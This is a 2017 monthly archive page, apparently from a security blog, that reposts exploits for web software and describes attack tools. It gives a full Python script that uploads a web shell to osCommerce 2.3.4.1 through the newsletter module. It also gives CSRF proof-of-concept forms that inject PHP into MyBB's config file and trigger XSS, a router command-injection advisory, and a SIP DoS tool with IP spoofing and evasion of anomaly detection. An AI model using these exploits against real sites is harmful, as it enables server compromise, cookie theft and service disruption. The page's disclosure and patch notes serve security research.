Monthly Archives: November 2017

E-Commerce PHP Shopping Cart Script osCommerce 2.3.4.1 – Arbitrary File Upload Vulnerability Exploit Code

 

 

 

E-Commerce PHP Shopping Cart Script osCommerce 2.3.4.1 – Arbitrary File Upload Vulnerability Exploit Code

 

# Exploit Title: osCommerce 2.3.4.1 Authenticated Arbitrary File Upload
# Date: 11.11.2017
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Vendor Homepage: https://www.oscommerce.com/
# Software Link: https://www.oscommerce.com/Products&Download=oscom234
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
"""
osCommerce does by default not allow Users to upload arbitrary files from the Admin Panel. However, any user
being privileged enough to send newsletters can exploit an objection injection in the osCommerce core to
upload any file, allowing the user to gain shell access. The user does not need to be an administrator,
any account with access to the newsletters will do.
More details can be found here:
    https://scannell-infosec.net/uploading-a-shell-from-within-the-oscommerce-admin-panel-via-object-injection/
"""
import urlparse
import argparse
import sys
import requests
DEFAULT_ADMIN_URL = "/catalog/admin/"
DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php"
# Builds an authenticated session and returns it if it was successful
def authenticate(username, password, url):
    # Build the Session and grab the inital cookie
    session = requests.Session()
    session.get(url + "login.php", allow_redirects=False)
    get_params = {'action': "process"}
    data = {"username": username, "password": password}
    # Attempt the authentication
    r = session.post(url + "login.php", data=data, params=get_params, allow_redirects=False)
    if r.status_code == 302:
        return session
    else:
        return False
def upload_file(local_filename, session, url):
    newsletter_script = url + "newsletters.php"
    r = session.get(newsletter_script, params={"action": "new"})
    payload = {
        'module': 'upload',
        'title': 'uploaded_fname',
        'content': './'
    }
    # Create the vulnerable newsletter and grab its ID
    r = session.post(newsletter_script, params={"action": "insert"}, data=payload, allow_redirects=False)
    try:
        newsletter_id = urlparse.urlparse(r.headers['Location']).query[4:]
        print "[+] Successfully prepared the exploit and created a new newsletter with nID %s" % (newsletter_id)
    except:
        print "[-] The script wasn't able to create a new newsletter"
        exit(1)
    # Now lock the newsletter
    r = session.post(newsletter_script, params={"action": "lock", "nID": newsletter_id})
    print "[+] Successfully locked the newsletter. Now attempting to upload.."
    # Send the final request, containing the file!
    files = {
        'uploaded_fname': open(local_filename)
    }
    r = session.post(newsletter_script, params={"action": "send", "nID": newsletter_id}, files=files)
    print "[*] Now trying to verify that the file %s uploaded.." % (local_filename)
    shell_url = url + local_filename
    r = requests.get(shell_url)
    print "[+] Got a HTTP 200 Reply for the uploaded file!"
    print "[+] The uploaded file should now be available at %s" % (shell_url)
# Main Routine starts here
usage = " %s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \
        "Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \
        "NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0])
parser = argparse.ArgumentParser(description='\n\nosCommerce 2.3.4 Authenticated Arbitrary File Upload', usage=usage)
parser.add_argument('-u', '--target-url', help='The target URL, including the path to the osCommerce installation (can also be document root /)', required=True)
parser.add_argument('-a', '--auth', help='Credentials for a privileged user in the format of username:password', required=True)
parser.add_argument('-f', '--file', help="The local file to be uploaded to the vulnerable webhost", required=True)
parser.add_argument('-p', '--admin-path', help="The path for the osCommerce Admin Area. This defaults to /catalog/admin/", required=False)
args = parser.parse_args()
# Parse username and password
username = args.auth.split(":")[0]
password = args.auth.split(":")[1]
url = args.target_url
# If the user hasn't passed a path to the osCommerce Admin Panel, use the default
if not args.admin_path:
    url += DEFAULT_ADMIN_URL
else:
    url += args.admin_path
# Authenticate the user and establish the connection
session = authenticate(username, password, url)
if not session:
    print "[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php")
    exit(1)
else:
    print "[+] Authentication successful"
upload_file(args.file, session, url)

 

Share Button

MyBB 1.8.13 – Remote Code Execution + Cross-Site Scripting Vulnerability Exploit Code Proof of Concept

# Exploit Title: RCE in MyBB up to 1.8.13 via installer
# Date: Found on 05-29-2017
# Exploit Author: Pablo Sacristan
# Vendor Homepage: https://mybb.com/
# Version: Version > 1.8.13 (Fixed in 1.8.13)
# CVE : CVE-2017-16780
This RCE can be executed via CSRF but doesn't require it (in some special cases). The requirements are there shouldn't be a lock in the /install/ directory and then if you have access to the install directory you don't need CSRF, but if you don't then you need CSRF. I have included a patch and a description. The exploit will write PHP code to /inc/config.php which is then 'REQUIRE'd in most of the pages in MyBB, the PoC will just write lollol to the top of every page in MyBB. I also have an XSS but that I will report later.
There is a CSRF vulnerability in MyBB /install/index.php which can be used to inject PHP code into /inc/config.php which is then used in most of the pages (require MYBB_ROOT."/inc/config.php" is in most of the pages).
  
The vulnerability exists in the table creation process for sqlite databases, this is because the Database Path is then inserted into the /inc/config.php file in line 11 as $config['database']['database'] = 'DB Path';
 
The vulnerability occurs because MyBB doesn't properly escape the Database Path, allowing an attacker to easily inject PHP by inserting a DB Path of : lol'; echo 'lol     this will not cause any parse errors since there will be a : ';    added at the end. Of course the attacker can easily just execute code in the server, getting backdoor access to the server easily.
 
A PoC would be to host a site like this:
<form name="x" action="http://localhost/install/index.php" method="post">
    
<input type="hidden" name='dbengine' value="sqlite">
<input type="hidden" name='config[sqlite][dbname]' value="lol'; echo 'lol">
<input type="hidden" name='config[sqlite][tableprefix]' value="mybb_">
<input type="hidden" name='action' value="create_tables">
                                        
</form>
 
<script>document.x.submit();</script>
 
 
And when a victim logged in as admin to a MyBB website visits this site they will have a "lollol" at the top of every page (or you can also make it do much more malicious things).
 
A simple patch would be to change /install/index.php:1410 to:
if(strstr($config['dbname'], "./") !== false || strstr($config['dbname'], "../") !== false || strstr($config['dbname'], "'") !== false || empty($config['dbname']))
——————————————————————————————————–
# Exploit Title: XSS in MyBB up to 1.8.13 via installer
# Date: Found on 05-29-2017
# Exploit Author: Pablo Sacristan
# Vendor Homepage: https://mybb.com/
# Version: Version > 1.8.13 (Fixed in 1.8.13)
# CVE : CVE-2017-16781
No HTML escaping when returning an $error in /install/index.php can
lead to an XSS which can be used to take over an attacker account.
The vulnerability occurs in /install/index.php:2503 and occurs because
there is no html encoding of the $error. A simple way to exploit this
is to create an error by using the Database Server Hostname and
inserting HTML characters there.
It is a POST XSS and this is a PoC:
<form name="x" action="http://target.com/install/index.php" method="post">
<input type="hidden" name='dbengine' value="mysqli">
<input type="hidden" name='config[mysqli][dbhost]' value="<img src=x onerror=alert(0)>">
<input type="hidden" name='config[mysqli][dbuser]' value="lol">
<input type="hidden" name='config[mysqli][dbpass]' value="lol">
<input type="hidden" name='config[mysqli][dbname]' value="lol">
<input type="hidden" name='config[mysqli][tableprefix]' value="lol">
<input type="hidden" name='config[mysqli][encoding]' value="utf8">
<input type="hidden" name='config[mysql][dbhost]' value="localhost">
<input type="hidden" name='action' value="create_tables">
</form>
<script>document.x.submit();</script>
Using this attack you can steal the cookies and you can install the MyBB server as you want, giving you almost full control over the MyBB server.
A simple fix would be to change the function error_list($array) to:
function error_list($array)
{
 $string = "<ul>\n";
 foreach($array as $error)
 {
            $string .= "<li>";
            $string .= htmlspecialchars($error);
            $string .= "</li>";
 }
 $string .= "</ul>\n";
 return $string;
}
Share Button

Eir D1000 Wireless Router – WAN Side Remote Command Injection Exploit

 

 

# Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
# Date: 7th November 2016
# Exploit Author: Kenzo
# Website: https://devicereversing.wordpress.com
# Tested on Firmware version: 2.00(AADU.5)_20150909
# Type: Webapps
# Platform: Hardware
 
Description
===========
By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the default Wi-Fi password. This is easily obtained with another TR-064 command.  
Available code here:
https://www.exploit-db.com/exploits/40740/
Share Button

VoIP SIP Based Audit and Attack Tool DDoS Scanning Pen Testing Download

 

 

SIP-Based Audit and Attack Tool

Mr.SIP is a tool developed to audit and simulate SIP-based attacks. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and defense approaches and then as an idea to convert it to a fully functional SIP-based penetration testing tool, it has been redeveloped into the current version.

 

It was used in an academic journal paper titled “Novel SIP-based DDoS Attacks and Effective Defense Strategies” published in Computers & Security 63 (2016) 29-44 by Elsevier, Science Direct http://sciencedirect.com/science/article/pii/S0167404816300980.

 

In the current state, Mr.SIP comprises four sub-modules named as SIP-NES, SIP-ENUM, SIP-DAS and SIP-ASP. Since it provides a modular structure to developers, more modules will continue be added by the authors and it is open to be contributed by the open-source developer community.

 

SIP-NES needs to enter the IP range or IP subnet information. It sends SIP OPTIONS message to each IP addresses in the subnet and according to the responses outputs the potential SIP clients and servers on that subnet.

 

SIP-ENUM outputs which SIP users are valid according to the responses in that network by sending REGISTER messages to each client IP addresses on the output of SIP-NES.

 

SIP-DAS (DoS Attack Simulator) is a module developed to simulate SIP-based DoS attacks. It comprises four components: spoofed IP address generator, SIP message generator, message sender and scenario player. It needs outputs of SIP-NES (Network Scanner) and SIP-ENUM (Enumerator) along with some pre-defined files.

 

SIP-DAS basically generates legitimate SIP INVITE message and sends it to the target SIP component via TCP or UDP. It has three different options for spoofed IP address generation, i.e., manual, random and by selecting spoofed IP address from subnet. IP addresses could be specified manually or generated randomly. Furthermore, in order to bypass URPF filtering, which is used to block IP addresses that do not belong to the subnet from passing onto the Internet, we designed a spoofed IP address generation module. Spoofed IP generation module calculated the subnet used and randomly generated spoofed IP addresses that appeared to come from within the subnet.

 

In order to bypass automatic message generation detection (anomaly detection) systems, random “INVITE” messages are generated that contained no patterns within the messages. Each generated “INVITE” message is grammatically compatible with SIP RFCs and acceptable to all of the SIP components.

 

“INVITE” message production mechanism specifies the target user(s) in the “To” header of the message. This attack can be executed against a single user or against legitimate SIP users on the target SIP server as an intermediary step before the DoS attack. The legitimate SIP users are enumerated and written to a file. Next, they are placed randomly in the “To” header of the generated “INVITE” messages. “Via, “User-Agent, “From,” and “Contact” headers within an “INVITE” message were syntactically generated using randomly selected information from the valid user agent and IP address lists. The tag parameter in the “From” header, the branch and source-port parameters in the “Via” header, and the values in the “Call-ID” header are syntactically and randomly generated using the valid user agent list. In addition, the source IP addresses in the “Contact” and “Via” headers are also generated using IP spoofing.

 

UDP is used widely in SIP systems as a transport protocol, so attacks on the target server are implemented by sending the generated attack messages in the network using UDP. Also TCP can be used optionally. The message sender of SIP-DAS allows the optional selection of how many SIP messages could be sent during one second. The number of SIP messages sent in one second depended on the resources (CPU and RAM) of the attacker machine.

 

SIP-ASP (Attack Scenario Player) allows the development of various SIP-based DoS attack scenarios through the use of SIP-DAS as the framework.

Usages Examples:

SIP-NES scan output

![Alt text](/screenshots/SIP-NES-scan.jpg?raw=true “SIP-NES scan output”)

Call flow created by SIP-NES

![Alt text](/screenshots/SIP-NES-messages.jpg?raw=true “Call flow created by SIP-NES”)

SIP-DAS attack output

![Alt text](/screenshots/SIP-DAS-attack.jpg?raw=true “SIP-DAS attack output”)

Call flow created by SIP-DAS

![Alt text](/screenshots/SIP-DAS-messages.jpg?raw=true “Call flow created by SIP-DAS”)

 

Share Button